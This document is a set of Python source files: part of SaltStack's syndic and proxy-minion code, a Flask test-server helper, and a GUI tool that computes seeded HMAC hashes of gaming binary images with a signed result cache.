if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
successful = True
except SaltClientError:
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
if not successful:
log.critical('Unable to call %s on any masters!', func)
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call '_return_pub_multi' on a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id'])
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event %s', mtag) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level master, don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self._return_retry_timer(),
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = list(six.itervalues(self.job_rets[master]))
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _metaproxy_call(opts, fn_name):
metaproxy = salt.loader.metaproxy(opts)
try:
metaproxy_name = opts['metaproxy']
except KeyError:
metaproxy_name = 'proxy'
errmsg = 'No metaproxy key found in opts for id ' + opts['id'] + '. ' + \
'Defaulting to standard proxy minion'
log.trace(errmsg)
metaproxy_fn = metaproxy_name + '.' + fn_name
return metaproxy[metaproxy_fn]
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
mp_call = _metaproxy_call(self.opts, 'post_master_init')
return mp_call(self, master)
def _target_load(self, load):
'''
Verify that the publication is valid and applies to this minion
'''
mp_call = _metaproxy_call(self.opts, 'target_load')
return mp_call(self, load)
def _handle_payload(self, payload):
mp_call = _metaproxy_call(self.opts, 'handle_payload')
return mp_call(self, payload)
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
mp_call = _metaproxy_call(self.opts, 'handle_decoded_payload')
return mp_call(self, data)
@classmethod
def _target(cls, minion_instance, opts, data, connected):
mp_call = _metaproxy_call(opts, 'target')
return mp_call(cls, minion_instance, opts, data, connected)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
mp_call = _metaproxy_call(opts, 'thread_return')
return mp_call(cls, minion_instance, opts, data)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
mp_call = _metaproxy_call(opts, 'thread_multi_return')
return mp_call(cls, minion_instance, opts, data)
class SProxyMinion(SMinion):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SProxyMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['grains'] = salt.loader.grains(self.opts)
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = (
'No "proxy" configuration key found in pillar or opts '
'dictionaries for id {id}. Check your pillar/options '
'configuration and contents. Salt-proxy aborted.'
).format(id=self.opts['id'])
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=False, proxy=self.proxy)
self.returners = salt.loader.returners(self.opts, self.functions, proxy=self.proxy)
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts, self.functions, proxy=self.proxy)
fq_proxyname = self.opts['proxy']['proxytype']
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg: __utils__ needs __proxy__ and __proxy__ needs __utils__)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
|
utils.py
|
import threading
import contextlib
import time
from flask import request, url_for
import requests
@contextlib.contextmanager
def serve_app(app, port, https=False):
opts = {'ssl_context': 'adhoc'} if https else {}
app.config['PREFERRED_URL_SCHEME'] = 'https' if https else 'http'
app.config['SERVER_NAME'] = 'localhost:' + str(port)
@app.route('/ping')
def ping():
return 'pong'
@app.route('/kill', methods=['POST'])
def kill():
request.environ['werkzeug.server.shutdown']()
return 'bye'
t = threading.Thread(target=lambda: app.run(port=port, **opts))
t.start()
with app.app_context():
# block until the server is up
# poll until the server responds; loop (rather than recurse) so a slow
# startup cannot exhaust the recursion limit
while True:
    try:
        requests.get(url_for('ping'), verify=False)
        break
    except requests.ConnectionError:
        time.sleep(0.05)
# run the tests
yield
# tear down the server
requests.post(url_for('kill'), verify=False)
t.join()
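# Illustrative usage sketch: the throwaway Flask app and port below are assumptions
# for demonstration only and are not part of the original helper.
if __name__ == '__main__':
    from flask import Flask
    demo_app = Flask(__name__)
    with serve_app(demo_app, 5001):
        # serve_app registers /ping and /kill itself; url_for() resolves because the
        # helper pushes an app context with SERVER_NAME set
        print(requests.get(url_for('ping'), verify=False).text)  # -> 'pong'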
|
epsig2_gui.py
|
# epsig2_gui.py
# Ported from R## L######'s Lua script version to Python.
#
## from R##'s original epsig2.lua
## Usage:
## lua epsig2.lua bnkfilename [seed [reverse] ]
##
## examples: lua epsig2.lua ARI\10163088_F23B_6040_1.bnk
## lua epsig2.lua ARI\10163088_F23B_6040_1.bnk 1234
## lua epsig2.lua ARI\10163088_F23B_6040_1.bnk 00 reverse
## If no seed supplied then a seed of 00 is used
##
## Note wrt a Casino "reverse"'d result: the result wrt Casino datafiles is the
## last 8 chars of the result displayed. E.g. for
## Result: 3371cc5638d735cefde5fb8da904ac8d54c2050c the result is 54c2050c
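## For illustration (values reused from the example above), that Casino result is
## simply the last 8 hex chars of the displayed hash:
##   '3371cc5638d735cefde5fb8da904ac8d54c2050c'[-8:]  ->  '54c2050c'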
# Version History
# v1.0 - Initial Release
# v1.1 - Add support to SL1 datafile seed files via combobox and file chooser widget,
# updated GUI
# v1.2 - Add support to use MSL (QCAS) files and automatically flip the SEED as
# expected for completing CHK01 (Yick's request)
# v1.3 - Add support for multiple selection of BNK files
# - introduces Caching of Hashes
# v1.3.1 - Fixes Cache to also uniquely identify Seed
# v1.4 - Adds Cache File support to DEFAULT_CACHE_FILE
# v1.4.1 - cache is now a dict of a dicts,
# i.e. { "fname":
# { "seed": "hash_result",
# "filename": "C:\blah\blah\cache.json"
# }
# } - for readability.
# - fixed cache file location to "\\\Justice.qld.gov.au\\Data
# \\OLGR-TECHSERV\\TSS Applications Source\\J#####\\epsig2_cachefile.json"
# - supports multiple seeds for each file
# - adds user specifiable Cache File (when you want to control your own cache)
# - adds automatic validation of Cache File, the file is signed and
# verified prior to loading automatically, via SHA1 hash and a .sigs file
# v1.4.2 - add option to write to formatted log file (request by Y### L##)
# - add option to display flipped bits for Seed in Console Log as an option.
# (request by D### N#####)
# - Update json signature file verifications to use SHA256
# v1.4.3 - Exits out when BNK file does not exist.
# v1.4.4 - was here somewhere
# v1.5 - separate epsig2 class (for use with: from epsig2_gui import epsig2)
# - separate Cache File as a separate class
# - By Default, a File Cache is now used as the OS can manage the resource being used
# - new Seed class, to add support to formatting and different behaviours when using different hash types
# - seed is automatically padded/truncated based on Hash-Type selected
# - Add support to BIN hashing (SG Gaming's ArgOS)
# - Add support to paste a complete path in the BNK/BIN file text edit field (for Bang's processes)
# - Now includes unit tests, to exercise the functions being utilised
# - Output to Output Field has been changed to the format: <SEED>\t<HASH>\t<FNAME>
# - GUI has been standardised: button sizes, padding, relief, etc.
# v1.6 - utilise epsig.exe as a sanity check.
# - test for spaces in BNK file names
# - test for other incorrect BNK file formats
import os
import sys
import csv
import hashlib
import hmac
import binascii
import struct
import array
import datetime
import string
import tkinter
import json
import tkinter as tk
import getpass
import logging
import threading
import time
import concurrent.futures
import atexit
import re
import subprocess
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
from tkinter import filedialog
from threading import Thread
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, wait, as_completed
VERSION = "1.6"
TEST=True
EPSIG_LOGFILE = "epsig2.log"
MAXIMUM_BLOCKSIZE_TO_READ = 65535
ACCEPTABLE_HASH_ALGORITHMS = ['CR16', 'CR32','PS32','PS16','OA4F','OA4R','SHA1']
if TEST:
DEFAULT_CACHE_FILE="epsig2_cachefile_v3.json"
else:
DEFAULT_CACHE_FILE = "\\\Justice.qld.gov.au\\Data\\OLGR-TECHSERV\\TSS Applications Source\\James\\epsig2_cachefile_v3.json"
DEFAULT_STR_LBL_SEED_FILE = "Details of Seed File: <No SL1/MSL Seed File Selected>"
p_reset = "\x08"*8
## BNKEntry class
class BNKEntry:
# helper class for sanitizing BNK file entries
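# Illustrative (hypothetical) BNK entry as it arrives here, i.e. one
# whitespace-split line of a .BNK file:
#   ['10163088.BIN', 'SHA1', 'p']  ->  fname='10163088.BIN', hash_type='SHA1'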
def __init__(self, line):
self.fields = [i for i in line if i] # remove empty strings
fields = self.fields
assert(len(fields) == 3), fields
# filenameX The filename+ext of a binary image (max 250 chars and must not contain spaces)
assert(len(fields[0]) < 250)
assert(" " not in fields[0]), fields[0]
self.fname = fields[0]
#algX The hash algorithm designation type to be used for the image.
# Refer to previous list of supported algorithm types & designations.
# Cannot be “BLNK” (i.e. no recursion)
assert(fields[1] in ACCEPTABLE_HASH_ALGORITHMS), fields[1]
self.hash_type = fields[1]
assert(fields[2] == 'p')
def toJSON(self):
return (json.dumps(self, default=lambda o: o.__dict__, sort_keys = True, indent=4))
## CacheFile class
class CacheFile():
def __init__(self, fname):
logging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s- %(message)s')
self.user_cache_file = fname
self.cache_dict = self.importCacheFile() # read file
def clearFile(self):
cache_data = dict() # empty
self.updateCacheFile(cache_data)
def importCacheFile(self):
cache_data = dict() # empty
if self.user_cache_file: # Handle User selectable Cache File
cache_location = self.user_cache_file
else:
cache_location = DEFAULT_CACHE_FILE
if os.path.isfile(cache_location):
# Verify Cache Integrity
if self.verifyCacheIntegrity(cache_location[:-4] + "sigs"):
with open(cache_location,'r') as json_cachefile:
cache_data = json.load(json_cachefile)
else:
logging.warning("**** WARNING **** File Cache integrity issue: " +
" Cannot Verify signature")
logging.info("Generating new File Cache file: " + cache_location)
cache_data = {} # return empty cache
else:
logging.info(cache_location +
" cannot be found. Generating default file...")
with open(cache_location, 'w') as json_cachefile:
# write empty json file
json.dump({},
json_cachefile,
sort_keys=True,
indent=4,
separators=(',', ': '))
return(cache_data)
def verifyCacheIntegrity(self, cache_location_sigs):
if os.path.isfile(cache_location_sigs): # Sigs file exist?
with open(cache_location_sigs, 'r') as sigs_file:
cache_sigs_data = json.load(sigs_file)
my_hash = cache_sigs_data['cachefile_hash']
fname = cache_sigs_data['filename']
generated_hash = epsig2.dohash_sha256(self, fname)
if my_hash == generated_hash:
return True
else:
return False
else:
# advise user
logging.warning("**** WARNING **** Generating new Cache Sigs file")
if self.user_cache_file: # Handle User selectable Cache File
cache_location = self.user_cache_file
else:
cache_location = DEFAULT_CACHE_FILE
self.signCacheFile(cache_location) # Generate Cache
def signCacheFile(self, cache_location):
sigsCacheFile = cache_location[:-4] + "sigs" # .json file renaming to .sigs file
with open(sigsCacheFile,'w') as sigs_file:
h = epsig2.dohash_sha256(self, cache_location) # requires file name as input
timestamp = datetime.now()
sigs_dict = { 'cachefile_hash' : h,
'filename': cache_location,
'last_generated_by_user' : getpass.getuser(),
'date': str(timestamp.strftime("%Y-%m-%d %H:%M"))
}
json.dump(sigs_dict,
sigs_file,
sort_keys=True,
indent=4,
separators=(',', ': '))
def updateCacheFile(self, cache_dict):
if self.user_cache_file:
cache_location = self.user_cache_file
else:
cache_location = DEFAULT_CACHE_FILE
if os.path.isfile(cache_location):
with open(cache_location, 'w') as json_cachefile:
json.dump(cache_dict,
json_cachefile,
sort_keys=True,
indent=4,
separators=(',', ': '))
self.signCacheFile(cache_location) # Sign Cache
## Main epsig2 class
class epsig2():
def __init__(self, seed, filepath, options_d, cache_dict, hash_type_str, epsigexe=True):
logging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(levelname)s- %(message)s')
self.verify_with_epsigexe = epsigexe # default this will use epsig.exe to verify BNK files.
self.seed = seed
self.filepath = filepath
self.options_d = options_d
self.mandir = os.path.dirname(self.filepath)
self.cache_dict = dict()
self.xor_result = ''
self.LogOutput = list()
self.user_cache_file = options_d['usr_cache_file']
self.selectedHashtype = hash_type_str
# this will delay each file to be checked.
if filepath.upper().endswith('BNK') and self.verify_with_epsigexe:
# use Rob's epsig3_7.exe to verify BNK file format
epsigexe_output = epsig2.bnkfile_validate_epsigexe(self, filepath, self.seed) # will block
if epsigexe_output and epsigexe_output['returncode'] == True:
for result in epsigexe_output['results']: # log epsig3_7.exe output to log file
logging.info("epsig.exe: " + result)
logging.info("epsig.exe: " + filepath + " format is correct.")
else:
logging.error("epsig.exe: " + os.path.basename(filepath) + " format Error. The file is not formatted as expected. Check the file contents for errors")
# need to provide error dialogue here
self.filepath = None
else:
if not self.verifyFileExists(self.filepath):
msg = "**** ERROR: " + self.filepath + " had errors while reading file contents"
logging.error(msg)
# self.processfile(self.filepath, chunks=8192)
def bnkfile_validate_epsigexe(self, fname, seed):
epsig_path = 'G:/OLGR-TECHSERV/BINIMAGE/epsig3_7.exe'
if not os.path.isfile(epsig_path):
logging.error("epsig.exe cannot be found in: " + epsig_path)
return None
if ' ' in os.path.basename(fname):
logging.error("no spaces allowed in filename: " + os.path.basename(fname))
return None
# the following will block
proc = subprocess.run([epsig_path, fname, seed], capture_output=True) #stdout=subprocess.PIPE
err = proc.stderr.decode('utf-8')
stdout = proc.stdout.decode('utf-8').split("\r\n")
stdout = [i for i in stdout if i] # remove empty strings
result_l = list()
for row in stdout:
if row.startswith('Hash'):
result_l.append(row)
rv = dict()
rv['err'] = err
rv['stdout'] = stdout
rv['results'] = result_l
rv['returncode'] = proc.returncode == 0
return rv
def verifyFileExists(self, fname):
mandir = os.path.dirname(fname)
rv = False
if os.path.isfile(fname) and fname.endswith(".BNK"):
with open(fname, 'r', encoding='utf-8') as bnkfile:
f = csv.reader(bnkfile, delimiter=' ')
try:
for line in f:
BNKEntry(line) # parse for errors
rv = True
except csv.Error as e:
sys.exit('fname %s, line %d: %s' % (fname, f.line_num, e))
elif os.path.isfile(fname):
rv = True
else:
return False
return rv
# def verifyFileExists(self, fname):
# mandir = os.path.dirname(fname)
# rv = True
# with open(fname, 'r') as infile:
# fdname = ['fname', 'type', 'blah']
# reader = csv.DictReader(infile, delimiter=' ', fieldnames = fdname)
# for row in reader:
# fp = os.path.join(mandir, str(row['fname']))
# if str(row['type']).upper() == 'SHA1' or str(row['type']).upper() == 'SHA256':
# # check if the file exists
# if not (os.path.isfile(fp)):
# msg = "**** ERROR: " + fp + " cannot be read from disk"
# logging.error(msg)
# rv = False
# else:
# msg = fp + " is not an expected hash type"
# logging.error(msg)
# rv = False
# return rv
# def verifyFileExists(self, f):
# rv = True
# if f.endswith(".BNK"):
# with open(f, 'r') as infile:
# fdname = ['fname', 'type', 'blah']
# reader = csv.DictReader(infile, delimiter=' ', fieldnames = fdname)
# for row in reader:
# path = os.path.dirname(f)
# fp = os.path.join(path, str(row['fname'])) # can't use: os.path.join(self.mandir, str(row['fname'])), as the Cache expects "/"
# if not os.path.isfile(fp):
# msg = "**** ERROR: " + fp + " cannot be read from disk"
# logging.error(msg)
# rv = False
# else:
# if not os.path.isfile(f):
# rv= False
# return rv
# returns Hashstring or None (if failed)
def checkCacheFilename(self, filename, seed_input, alg_input): # alg_input
# For filename_seed, concatenate to form unique string.
if filename in self.cache_dict.keys(): # a hit?
data = self.cache_dict.get(filename) # now a list
for item in data:
# Check if Seed and Algorithm matches.
if item['seed'] == seed_input and item['alg'] == alg_input:
# verified_time = item['verify']
return(str(item['hash'])) # return Hash result
return None
def checkCacheFilename_BNK(self, filename, seed_input, alg_input): # alg_input
# For filename_seed, concatenate to form unique string.
if filename in self.cache_dict.keys(): # a hit?
data = self.cache_dict.get(filename) # now a list
# print(json.dumps(data, indent=4, sort_keys=True))
for item in data:
# Check if Seed and Algorithm matches.
if item['seed'] == seed_input and item['alg'] == alg_input:
# verified_time = item['verify']
return(str(item['hash'])) # return Hash result
return None
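# Illustrative (hypothetical) cache_dict shape that both lookups above assume --
# a file path key mapping to a list of {seed, alg, hash} entries:
#   { "G:/BINIMAGE/ARI/10163088.BIN": [
#       {"seed": "00", "alg": "HMAC-SHA1", "hash": "..."} ] }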
# input: file to be CRC32
def dohash_crc32(self, fname):
buf = open(fname,'rb').read()
buf = (binascii.crc32(buf) & 0xFFFFFFFF)
return "%08X" % buf
# input: file to be hashed using sha256()
# output: hexdigest of input file
def dohash_sha256(self, fname, chunksize=8192):
m = hashlib.sha256()
# Read in chunksize blocks at a time
with open(fname, 'rb') as f:
while True:
block = f.read(chunksize)
if not block: break
m.update(block)
return m.hexdigest()
# input: file to be hashed using hmac-sha1
# output: hexdigest of input file
def dohash_hmacsha(self, fname, chunksize, hash_type):
# time.sleep(1)
# change this if you want other hashing types for HMAC, e.g. hashlib.md5
key = bytes.fromhex(self.seed)
m = None
if hash_type == 'HMAC-SHA1':
m = hmac.new(key, digestmod = hashlib.sha1)
elif hash_type == 'HMAC-SHA256':
m = hmac.new(key, digestmod = hashlib.sha256)
else:
logging.error("unknown hash type: " + hash_type)
sys.exit(1)
done = 0
size = os.path.getsize(fname)
# Read in chunksize blocks at a time
with open(fname, 'rb') as f:
while True:
# time.sleep(1)
block = f.read(chunksize)
done += chunksize
sys.stdout.write("%7d"%(done*100/size) + "%" + p_reset)
if not block: break
m.update(block)
return m.hexdigest()
def checkhexchars(self, text):
return (all(c in string.hexdigits for c in text))
def dobin(self, fname, blocksize):
#time.sleep(1)
oh = "0000000000000000000000000000000000000000000000000000000000000000"
if self.options_d['cache_file_f'] == True: # Use Cache File
# Overwrite self.cache_dict with contents of file
cache_file = CacheFile(self.user_cache_file)
self.cache_dict = cache_file.cache_dict
if (len(self.seed) < 2 or not self.checkhexchars(self.seed)):
messagebox.showerror("Error in Seed Input",
"Expected atleast two Hexadecimal characters as the Seed input" +
".\n\nCheck your Seed string again: " + self.seed)
return -1
else:
logging.debug("Processing: " + fname + "\t[" + str(threading.currentThread().getName()) + "]")
try:
hash_type = self.selectedHashtype # this is HMAC-SHA1 or HMAC-SHA256
if (os.path.isfile(fname)):
# The following should return a list
cachedhit = self.checkCacheFilename(fname, self.seed, hash_type) # TODO: for BIN FILES?
# logging.debug("%-50s\tSEED" % (self.format_output(self.seed, self.options_d)))
if cachedhit:
localhash = cachedhit
else: # append to cachelist
new_cache_list = list()
localhash = self.dohash_hmacsha(fname, blocksize, self.selectedHashtype)
seed_info = {
'seed': self.seed,
'alg': hash_type,
'hash': localhash
}
cache_entry_list = self.cache_dict.get(fname) # Should return a list.
if cache_entry_list : # File Entry Exists, append to list
cache_entry_list.append(seed_info) # print this
self.cache_dict[fname] = cache_entry_list # keep unique
else: # No File Entry Exits generate new list entry in cache_dict
new_cache_list.append(seed_info)
self.cache_dict[fname] = new_cache_list # keep unique
# if self.useCacheFile.get() == 1:
if self.options_d['cache_file_f'] == True:
# self.updateCacheFile(self.cache_dict) # Update file cache
cache_file.updateCacheFile(self.cache_dict) # Update file cache
else:
self.cache_dict[fname] = new_cache_list # update local cache
# Append Object to Log object
self.LogOutput.append({'filename': os.path.basename(fname),
'filepath': self.mandir + "/" ,
'seed' : self.seed,
'alg': hash_type,
'hash': localhash})
oh = hex(int(oh,16) ^ int(str(localhash), 16)) # XOR result
if cachedhit:
outputstr = "%-50s\t%-s\t%-10s" % (self.format_output(str(localhash),
self.options_d), os.path.basename(fname), "(cached)")
else:
outputstr = "%-50s\t%-s\t" % (self.format_output(str(localhash), self.options_d),
os.path.basename(fname))
logging.debug(outputstr + "[" + str(threading.currentThread().getName()) + "]")
else:
logging.error("\n!!!!!!!!!!!!!! ERROR: Could not read file: " + fname)
except KeyboardInterrupt:
logging.debug("Keyboard interrupt during processing of files. Exiting")
sys.exit(1)
return oh # { 'oh': oh, 'cache_dict' : self.cache_dict, 'rv': self.LogOutput ,'filename' : fname}
# limitations: currently only supports BNK files with SHA1 contents
def dobnk(self, fname, blocksize):
#time.sleep(1)
cache_file = None
outputstr = None
if self.options_d['cache_file_f'] == True: # Use Cache File
# Overwrite self.cache_dict with contents of file
cache_file = CacheFile(self.user_cache_file)
self.cache_dict = cache_file.cache_dict
oh = "0000000000000000000000000000000000000000" # 40 chars
# Verify Seed is a hex string at least 2 digits long
if (len(self.seed) < 2 or not epsig2.checkhexchars(self, self.seed)):
messagebox.showerror("Error in Seed Input",
"Expected atleast two Hexadecimal characters as the Seed input" +
".\n\nCheck your Seed string again: " + self.seed)
return -1
else:
try:
logging.debug("Processing: " + fname + "\t[" + str(threading.currentThread().getName()) + "]")
with open(fname, 'r') as infile:
fdname = ['fname', 'type', 'blah']
reader = csv.DictReader(infile, delimiter=' ', fieldnames = fdname)
# logging.debug("%-50s\tSEED" % (self.format_output(self.seed, self.options_d)))
#futures = list()
#pool = ThreadPoolExecutor(5) # 5 threads max
for row in reader:
if str(row['type']).upper() == 'SHA1' or str(row['type']).upper() == 'SHA256':
# check if the file exists
fp = self.mandir + "/" + str(row['fname']) # can't use: os.path.join(self.mandir, str(row['fname'])), as the Cache expects "/"
if (os.path.isfile(fp)):
# The following should return a string if matches or None
cachedhit = epsig2.checkCacheFilename_BNK(self, fp, self.seed, str(row['type']).upper())
if cachedhit != None:
# logging.debug("Cached hit!: " + cachedhit)
localhash = cachedhit
else:
new_cache_list = list()
localhash = epsig2.dohash_hmacsha(self, self.mandir + "/" \
+ str(row['fname']), blocksize, 'HMAC-' \
+ str(row['type']).upper()) # BLNK only supports HMAC-SHA1 or HMAC-SHA256
#fp = self.mandir + "/" + str(row['fname'])
#futures.append(pool.submit(self.dohash_hmacsha, fp, blocksize, self.selectedHashtype)) # add processs to threadpool
#for x in as_completed(futures):
# localhash = x.result()
# generate dict for new Filename entry
seed_info = {
'seed': self.seed,
'alg': row['type'].upper(),
'hash': localhash
}
cache_entry_list = self.cache_dict.get(self.mandir + "/" +
str(row['fname'])) # Should return a list.
if cache_entry_list : # File Entry Exists, append to list
cache_entry_list.append(seed_info) # print this
self.cache_dict[self.mandir + "/"
+ str(row['fname'])] = cache_entry_list # keep unique
else: # No File Entry Exits generate new list entry in cache_dict
new_cache_list.append(seed_info)
self.cache_dict[self.mandir + "/" +
str(row['fname'])] = new_cache_list # keep unique
# if self.useCacheFile.get() == 1:
if self.options_d['cache_file_f'] == True:
# self.updateCacheFile(self.cache_dict) # Update file cache
cache_file.updateCacheFile(self.cache_dict) # Update file cache
else:
self.cache_dict[self.mandir + "/" +
str(row['fname'])] = new_cache_list # update local cache
# Append Object to Log object
self.LogOutput.append({'filename': str(row['fname']),
'filepath': self.mandir + "/" ,
'seed' : self.seed,
'alg': row['type'].upper(),
'hash': localhash})
# handle incorrect seed length
if localhash == 0:
break # exit out cleanly
# change to string to Hexadecimal - int(str,16), then XOR result
oh = hex(int(oh,16) ^ int(str(localhash), 16)) # XOR'ed result
if cachedhit:
outputstr = "%-50s\t%-s\t%-10s" % (epsig2.format_output(self, str(localhash),
self.options_d), str(row['fname']), "(cached)")
else:
outputstr = "%-50s\t%-s" % (epsig2.format_output(self, str(localhash), self.options_d),
str(row['fname']))
logging.debug(outputstr + "[" + str(threading.currentThread().getName()) + "]")
# self.outxput.append(outputstr)
else:
error_text = "\n!!!!!!!!!!!!!! ERROR: Could not read file: " + str(row['fname']) + " in: " + fname + "\n\n"
logging.error("Could not read file: " + str(row['fname']) + " in: " + fname)
return -1
# self.output.append(error_text)
else:
messagebox.showerror("Not Yet Implemented!", "Unsupported hash algorithm: " + row['type'].upper() + ".\n\nExiting. Sorry!")
logging.error('Unsupported hash algorithm: ' + row['type'])
return -1
# Need to implement CR16, CR32, PS32, PS16, OA4F and OA4R, and SHA256 if need be.
